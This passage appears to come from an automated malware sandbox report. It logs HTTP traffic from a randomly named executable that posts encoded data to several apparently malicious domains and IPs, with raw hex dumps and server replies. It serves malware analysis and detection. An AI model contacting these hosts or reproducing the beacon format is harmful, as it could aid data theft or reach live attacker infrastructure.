                                                    Data Raw: 56 36 68 3d 73 78 59 74 36 37 50 59 64 70 50 77 58 44 36 78 34 46 2b 36 53 72 79 45 6b 78 69 59 6c 61 71 70 77 4f 64 4a 46 6c 77 6e 30 55 72 7a 44 69 6e 5a 45 38 6a 31 50 42 4b 46 7a 69 53 34 42 44 66 39 41 4c 2b 35 4d 51 41 2b 74 32 68 63 30 50 77 4c 56 52 63 75 50 33 76 33 4f 2b 30 47 6b 7a 4d 72 55 48 72 68 63 70 68 77 33 76 62 46 42 62 71 45 64 57 61 4a 53 78 74 42 79 66 6a 61 6d 6c 36 73 66 6c 74 77 7a 58 61 68 5a 6a 4c 58 51 53 31 66 69 52 65 36 74 67 4d 46 75 76 49 54 6e 66 2f 74 62 4f 76 43 54 39 65 41 4d 70 7a 65 54 4c 67 41 6e 4f 5a 4c 38 55 2b 59 32 2b 41 2b 42 38 70 56 74 38 53 2f 70 63 66 48 4f 50 50 59 69 4d 34 35 6b 34 77 45 6c 4d 59 43 61 45 34 30
                                                    Data Ascii: V6h=sxYt67PYdpPwXD6x4F+6SryEkxiYlaqpwOdJFlwn0UrzDinZE8j1PBKFziS4BDf9AL+5MQA+t2hc0PwLVRcuP3v3O+0GkzMrUHrhcphw3vbFBbqEdWaJSxtByfjaml6sfltwzXahZjLXQS1fiRe6tgMFuvITnf/tbOvCT9eAMpzeTLgAnOZL8U+Y2+A+B8pVt8S/pcfHOPPYiM45k4wElMYCaE40


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.55719472.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:24:50.040246010 CEST1745OUTPOST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 73 78 59 74 36 37 50 59 64 70 50 77 58 44 36 78 34 46 2b 36 53 72 79 45 6b 78 69 59 6c 61 71 70 77 4f 64 4a 46 6c 77 6e 30 55 6a 7a 44 7a 48 5a 57 62 66 31 4a 78 4b 46 74 53 53 31 42 44 65 68 41 4c 6d 39 4d 51 4d 78 74 31 56 63 31 70 38 4c 43 55 67 75 47 33 76 33 4d 2b 30 44 6e 44 4e 72 55 48 62 66 63 70 52 77 33 76 62 46 42 64 47 45 61 44 75 4a 66 52 74 43 78 66 6a 57 73 46 36 49 66 68 49 48 7a 58 65 66 5a 33 33 58 4a 79 6c 66 6b 79 6d 36 77 51 4d 48 76 76 49 4c 6e 66 44 2b 62 4f 79 7a 54 38 62 76 4d 70 4c 65 51 73 56 33 36 73 42 76 75 32 2b 4d 37 35 59 77 5a 71 78 71 6e 74 65 57 71 65 48 58 4b 74 6d 37 73 70 73 48 68 73 31 7a 30 5a 49 71 62 78 35 42 54 57 77 77 72 4e 64 31 78 54 51 76 64 76 52 46 46 37 63 31 53 4e 69 42 53 47 69 49 55 56 46 79 55 52 75 2f 78 57 4f 30 48 6a 6b 47 33 6e 79 42 71 67 71 44 47 56 4a 5a 75 68 65 32 6c 38 6b 57 53 46 63 6d 41 46 6c 6d 71 76 6c 6f 69 6d 56 7a 71 6e 61 67 57 4d 32 77 2f 4f 68 56 38 66 47 61 67 4c 6e 30 56 6b 6e 54 63 4c 33 52 37 77 2b 58 63 45 [TRUNCATED]
                                                    Data Ascii: V6h=sxYt67PYdpPwXD6x4F+6SryEkxiYlaqpwOdJFlwn0UjzDzHZWbf1JxKFtSS1BDehALm9MQMxt1Vc1p8LCUguG3v3M+0DnDNrUHbfcpRw3vbFBdGEaDuJfRtCxfjWsF6IfhIHzXefZ33XJylfkym6wQMHvvILnfD+bOyzT8bvMpLeQsV36sBvu2+M75YwZqxqnteWqeHXKtm7spsHhs1z0ZIqbx5BTWwwrNd1xTQvdvRFF7c1SNiBSGiIUVFyURu/xWO0HjkG3nyBqgqDGVJZuhe2l8kWSFcmAFlmqvloimVzqnagWM2w/OhV8fGagLn0VknTcL3R7w+XcERbU3V8g6CdCqhg4+C4ZX5D8oLpMRdJd9kL6yLAkHcERFyq2jgRwkhTHq+Ay8BdiI+w7uY8SfTwLd/DHk5I+rqutGAeBs4v5Mcxe9mVtLdj5gSo/TMkTGXiH1o7zGWh5eGNjc4RVC3WufxdtAXJnz3kQc8YEUQoZu7ntXzs30vJFdEd/WU9l0l5u4MxEgasmCVrJb7e+ef7kLcEtP/qNTSym1h/8jJDzRctn8j8/z1szuCL7H6oLFoB45qb7rckZmK8tRGak8m7UD/K4Y7FbXtSSkUH3nNn9SBgUaEI3KgZWOHAbWgdl+VJl5UXhesAHv1tgP5CFHrHXlXM2W19J9rNlzn4DWKqHYocyOgpdGXxPqvZa9EFztuk7MGiMYEG6c6CTO3r4Y0VCYBtNlOOlXmjnzF4+DA3DqeV7aQimd25/7Hb3CLAbKAC/okAoNJvvvEWgbHlyCipsmMG+lK4cJcQzt4OoiFTVgERyTrcnwZ1591lBvTi+ZE77ck0NMjkZgKaqgmC51fUk74KOF3vpbOoSDFXh2CA9jnIHUlGFNZWIOyOsX/Nw/nWwAPV79sonvs4vQtvF4M0MyOliC/e5D16Llp0PMlerDQOKirwty8VrRd6g4EI1ZSxJN1TzpAzhjoJpRhoPZ+NVIAZVtrb7OJfG1Khvw9/VSYG [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.55719572.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:24:52.589010954 CEST449OUTGET /f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:24:53.108608961 CEST509INHTTP/1.1 302 Moved Temporarily
                                                    Date: Thu, 05 Sep 2024 12:24:53 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                    X-Powered-By: PHP/5.4.16
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Location: http://ww12.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ&usid=16&utid=34491525176
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.55719615.197.240.20802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:06.534112930 CEST735OUTPOST /n4sv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.marinamaquiagens.online
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.marinamaquiagens.online
                                                    Referer: http://www.marinamaquiagens.online/n4sv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 63 6c 55 4d 62 61 49 34 44 4a 6b 49 31 53 34 75 2f 49 46 65 4d 45 68 45 33 6b 79 61 39 45 39 74 68 2b 6c 68 55 48 37 46 69 31 76 48 33 39 4d 79 62 66 50 58 6c 76 45 31 53 65 62 62 71 30 6b 43 2f 39 42 44 63 70 4e 70 45 76 62 58 30 4d 59 51 46 6e 73 57 68 70 43 4b 73 37 2b 35 51 32 70 6e 45 70 77 50 58 49 57 67 4f 36 67 33 49 30 43 58 39 6c 66 6d 62 2f 42 50 57 36 45 74 67 73 75 61 72 48 64 6f 79 30 61 6c 54 69 34 58 58 75 4b 63 73 51 68 54 30 6e 32 72 55 77 2b 71 39 61 38 4a 37 68 71 6f 34 68 75 51 35 6a 64 7a 6d 30 76 54 72 6a 33 61 62 61 58 6a 65 58 75 36 4f 49 6a 48 32 59 41 79 42 5a 41 3d
                                                    Data Ascii: V6h=clUMbaI4DJkI1S4u/IFeMEhE3kya9E9th+lhUH7Fi1vH39MybfPXlvE1Sebbq0kC/9BDcpNpEvbX0MYQFnsWhpCKs7+5Q2pnEpwPXIWgO6g3I0CX9lfmb/BPW6EtgsuarHdoy0alTi4XXuKcsQhT0n2rUw+q9a8J7hqo4huQ5jdzm0vTrj3abaXjeXu6OIjH2YAyBZA=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.55719715.197.240.20802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:09.070902109 CEST755OUTPOST /n4sv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.marinamaquiagens.online
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.marinamaquiagens.online
                                                    Referer: http://www.marinamaquiagens.online/n4sv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 63 6c 55 4d 62 61 49 34 44 4a 6b 49 30 79 49 75 2b 70 46 65 64 30 68 4c 38 45 79 61 7a 55 38 6d 68 2b 35 68 55 47 2f 56 69 48 37 48 33 59 49 79 63 65 50 58 67 76 45 31 5a 2b 62 65 6b 55 6b 33 2f 39 46 78 63 6f 78 70 45 76 66 58 30 4e 6f 51 45 57 73 56 69 5a 43 49 6b 62 2b 6e 49 57 70 6e 45 70 77 50 58 49 53 65 4f 36 34 33 49 46 79 58 38 45 66 68 59 2f 41 39 58 36 45 74 71 4d 76 54 72 48 64 4f 79 32 2b 66 54 67 77 58 58 75 61 63 73 43 4a 53 74 33 32 70 51 77 2b 38 36 4a 6c 5a 2b 79 71 2f 39 41 37 54 74 79 6c 46 6e 43 43 35 78 42 2f 79 49 36 37 62 4f 45 6d 4e 66 34 43 75 73 37 51 43 66 4f 55 51 42 44 72 73 5a 72 78 73 48 79 46 78 57 72 50 50 4c 6e 4c 66
                                                    Data Ascii: V6h=clUMbaI4DJkI0yIu+pFed0hL8EyazU8mh+5hUG/ViH7H3YIycePXgvE1Z+bekUk3/9FxcoxpEvfX0NoQEWsViZCIkb+nIWpnEpwPXISeO643IFyX8EfhY/A9X6EtqMvTrHdOy2+fTgwXXuacsCJSt32pQw+86JlZ+yq/9A7TtylFnCC5xB/yI67bOEmNf4Cus7QCfOUQBDrsZrxsHyFxWrPPLnLf


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.55719815.197.240.20802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:11.625915051 CEST1772OUTPOST /n4sv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.marinamaquiagens.online
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.marinamaquiagens.online
                                                    Referer: http://www.marinamaquiagens.online/n4sv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 63 6c 55 4d 62 61 49 34 44 4a 6b 49 30 79 49 75 2b 70 46 65 64 30 68 4c 38 45 79 61 7a 55 38 6d 68 2b 35 68 55 47 2f 56 69 47 44 48 33 4b 41 79 61 39 58 58 6a 76 45 31 57 75 62 66 6b 55 6b 51 2f 38 68 50 63 6f 38 53 45 73 33 58 31 72 63 51 44 69 34 56 35 70 43 49 6f 37 2b 6d 51 32 70 79 45 6f 63 78 58 49 43 65 4f 36 34 33 49 48 71 58 37 56 66 68 65 2f 42 50 57 36 45 78 67 73 76 2f 72 48 56 77 79 32 37 69 55 54 6f 58 5a 75 71 63 74 32 70 53 79 6e 32 6e 65 51 2f 2f 36 4a 59 44 2b 79 32 46 39 42 2f 74 74 31 42 46 6c 30 37 6c 30 53 37 5a 66 63 66 6b 4b 6c 75 66 47 64 6d 4b 72 36 73 6d 61 4e 41 43 4a 69 72 65 53 66 4e 47 4f 6d 59 50 55 66 4c 39 46 58 2b 53 37 52 52 41 72 6e 6b 69 2b 33 36 56 49 66 45 68 79 36 46 6f 78 4d 70 4d 4c 4c 4a 55 63 62 52 6c 57 42 55 75 64 77 4e 30 52 6c 6a 78 55 50 6e 34 51 64 44 32 31 7a 7a 38 67 36 52 7a 48 68 58 4a 48 76 74 4b 2b 75 35 43 33 4a 55 6c 53 4a 4b 70 65 6b 49 74 76 55 4e 39 69 32 48 6a 4c 79 50 6a 34 6f 45 46 30 63 62 6d 77 50 2b 4c 43 56 37 75 63 76 [TRUNCATED]
                                                    Data Ascii: V6h=clUMbaI4DJkI0yIu+pFed0hL8EyazU8mh+5hUG/ViGDH3KAya9XXjvE1WubfkUkQ/8hPco8SEs3X1rcQDi4V5pCIo7+mQ2pyEocxXICeO643IHqX7Vfhe/BPW6Exgsv/rHVwy27iUToXZuqct2pSyn2neQ//6JYD+y2F9B/tt1BFl07l0S7ZfcfkKlufGdmKr6smaNACJireSfNGOmYPUfL9FX+S7RRArnki+36VIfEhy6FoxMpMLLJUcbRlWBUudwN0RljxUPn4QdD21zz8g6RzHhXJHvtK+u5C3JUlSJKpekItvUN9i2HjLyPj4oEF0cbmwP+LCV7ucveAUNlC4rYR1giWGfScNUxUrbUFdQmFOys3DBJhur4CgXh1Jv3/zTrdqKMQUVAXgr2RjM6uUQIb2Wlte+kRfBInSTQ4R0Ii3OnvpT5cj7kPEEhZHCrYPrxDCRBVhBdyrIeUuF2xRNikZdm3cFmckvWXEH+GP0JuvbwG8a2Aj9WKr4M2n+vVk4JFjtnXqUcfEPjiklHoEK7uYl1qxZdk3g32pwskRLHQQ0wHs54jh//ZHrfUMC0hsgg1vob59QDTBWyMn5mh7mRTxFeG9w2RKrcXxlRD//GkY6S4e2ibxxVfKYjyHpsnRFaL4RW9DZQ78hpc3O8TmacA4jh7BZmqrNXDoSmArLNCMCdvJqW9YHgNWhgHxxjfQIh9kM9z0DT/sS71Bs062Or8psdYkhXA2pHMXlqmRXAbscinUQKU0k+3UFLFnfXQ4BoHNdv8dlmAA0+CkfB8qzHya5lzOp149mY7pSyOSzEcnxH7y2E2TPAhYNNw/LDnJpBZ3sSTzTwZgJJ4eSluYMcI4UJv7i+mROPaLK96xku4WxElWOeMm0pVIch/1NqFko7VgTEQhg/Wxc7FciQqkw5WtFYLdSkMRw8FRKQ8EPAJivkk6u0r9sdSJYnrqhYtcRQbhffYUskk0CZkpJ5b6WPk0Vi6/WTcRShD9K8vbhJkduY5 [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.55719915.197.240.20802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:14.164923906 CEST458OUTGET /n4sv/?V6h=Rn8sYt8YDaYT7jFf5K1RN21751bCn2USuvRVR0XZr3jMl4ljVezIqMhPdYzWo0QynoEEVao5Nd7ZkOoeHk8KzYmVnd6lY3cEc8VkS42gD8QuE3e2/CTNStdnS6k5rMWW1Q==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.marinamaquiagens.online
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:25:14.632872105 CEST409INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 05 Sep 2024 12:25:14 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 269
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 36 68 3d 52 6e 38 73 59 74 38 59 44 61 59 54 37 6a 46 66 35 4b 31 52 4e 32 31 37 35 31 62 43 6e 32 55 53 75 76 52 56 52 30 58 5a 72 33 6a 4d 6c 34 6c 6a 56 65 7a 49 71 4d 68 50 64 59 7a 57 6f 30 51 79 6e 6f 45 45 56 61 6f 35 4e 64 37 5a 6b 4f 6f 65 48 6b 38 4b 7a 59 6d 56 6e 64 36 6c 59 33 63 45 63 38 56 6b 53 34 32 67 44 38 51 75 45 33 65 32 2f 43 54 4e 53 74 64 6e 53 36 6b 35 72 4d 57 57 31 51 3d 3d 26 73 48 3d 6e 56 56 48 64 44 54 78 32 50 53 54 56 4a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V6h=Rn8sYt8YDaYT7jFf5K1RN21751bCn2USuvRVR0XZr3jMl4ljVezIqMhPdYzWo0QynoEEVao5Nd7ZkOoeHk8KzYmVnd6lY3cEc8VkS42gD8QuE3e2/CTNStdnS6k5rMWW1Q==&sH=nVVHdDTx2PSTVJ"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.557200199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:28.027965069 CEST693OUTPOST /iuti/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.yi992.com
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.yi992.com
                                                    Referer: http://www.yi992.com/iuti/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 73 71 76 37 6e 6c 39 4c 54 49 62 5a 49 64 48 34 54 52 49 79 64 6e 42 77 2f 6b 4d 46 59 55 61 49 5a 65 4e 6c 39 65 42 51 68 67 52 4b 79 38 79 44 52 41 49 33 5a 66 75 56 31 70 65 58 34 6d 37 68 48 53 66 63 45 4c 59 51 6b 77 39 59 59 72 54 50 76 47 4e 65 70 2f 4c 77 56 6e 5a 52 62 4d 65 67 66 6f 4c 50 72 5a 54 73 76 79 5a 44 78 76 58 33 30 6b 69 51 30 6b 6b 78 39 53 75 35 30 32 49 71 78 74 46 4e 4b 79 50 6a 32 33 6f 66 6a 57 32 69 75 62 49 6f 59 73 33 32 4e 42 6c 59 74 6b 75 49 4b 4b 45 55 50 64 50 52 72 37 68 36 4e 61 75 5a 6b 61 2f 41 35 4c 67 2f 4c 37 78 74 47 55 51 5a 4f 30 65 55 49 77 55 3d
                                                    Data Ascii: V6h=sqv7nl9LTIbZIdH4TRIydnBw/kMFYUaIZeNl9eBQhgRKy8yDRAI3ZfuV1peX4m7hHSfcELYQkw9YYrTPvGNep/LwVnZRbMegfoLPrZTsvyZDxvX30kiQ0kkx9Su502IqxtFNKyPj23ofjW2iubIoYs32NBlYtkuIKKEUPdPRr7h6NauZka/A5Lg/L7xtGUQZO0eUIwU=
                                                    Sep 5, 2024 14:25:28.483258009 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:25:27 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1102
                                                    x-request-id: 2851622f-1411-454f-a6ec-61008623bdc7
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==
                                                    set-cookie: parking_session=2851622f-1411-454f-a6ec-61008623bdc7; expires=Thu, 05 Sep 2024 12:40:28 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 64 74 41 73 72 33 77 61 49 43 62 2f 2b 4b 7a 71 74 58 52 6e 55 79 68 61 41 58 66 4f 77 4a 66 44 74 71 32 45 49 34 44 37 6a 43 4c 6a 79 32 4a 4b 56 38 48 6f 33 49 5a 44 63 36 70 62 4b 38 6f 74 4e 4e 39 4b 72 51 76 33 6e 57 4a 5a 39 77 41 4a 33 2f 4a 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:25:28.483275890 CEST555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjg1MTYyMmYtMTQxMS00NTRmLWE2ZWMtNjEwMDg2MjNiZGM3IiwicGFnZV90aW1lIjoxNzI1NTM5MT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.557201199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:30.555933952 CEST713OUTPOST /iuti/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.yi992.com
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.yi992.com
                                                    Referer: http://www.yi992.com/iuti/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 73 71 76 37 6e 6c 39 4c 54 49 62 5a 61 4e 58 34 66 51 49 79 56 6e 42 7a 36 6b 4d 46 52 30 61 4d 5a 65 4a 6c 39 61 52 41 68 53 46 4b 79 65 61 44 53 43 67 33 63 66 75 56 39 4a 65 57 33 47 37 36 48 53 54 55 45 4a 38 51 6b 30 74 59 59 70 37 50 75 78 35 5a 6f 76 4c 2b 41 58 5a 54 47 38 65 67 66 6f 4c 50 72 5a 48 4b 76 30 78 44 78 2f 6e 33 31 46 69 66 39 45 6b 32 72 69 75 35 77 32 4a 6a 78 74 46 37 4b 7a 54 61 32 31 51 66 6a 55 75 69 70 4f 38 76 53 73 33 30 44 68 6b 48 75 31 44 58 46 6f 77 36 4f 65 75 30 7a 6f 42 44 42 4d 44 7a 2b 34 33 6f 71 72 4d 48 62 6f 35 61 58 6b 78 77 55 58 4f 6b 57 6e 44 4e 70 59 34 6d 6b 36 58 52 6e 33 35 73 37 52 6a 65 51 55 64 47
                                                    Data Ascii: V6h=sqv7nl9LTIbZaNX4fQIyVnBz6kMFR0aMZeJl9aRAhSFKyeaDSCg3cfuV9JeW3G76HSTUEJ8Qk0tYYp7Pux5ZovL+AXZTG8egfoLPrZHKv0xDx/n31Fif9Ek2riu5w2JjxtF7KzTa21QfjUuipO8vSs30DhkHu1DXFow6Oeu0zoBDBMDz+43oqrMHbo5aXkxwUXOkWnDNpY4mk6XRn35s7RjeQUdG
                                                    Sep 5, 2024 14:25:31.040836096 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:25:30 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1102
                                                    x-request-id: 7f33cd8c-2b95-41dd-aa6e-54739a3138f8
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
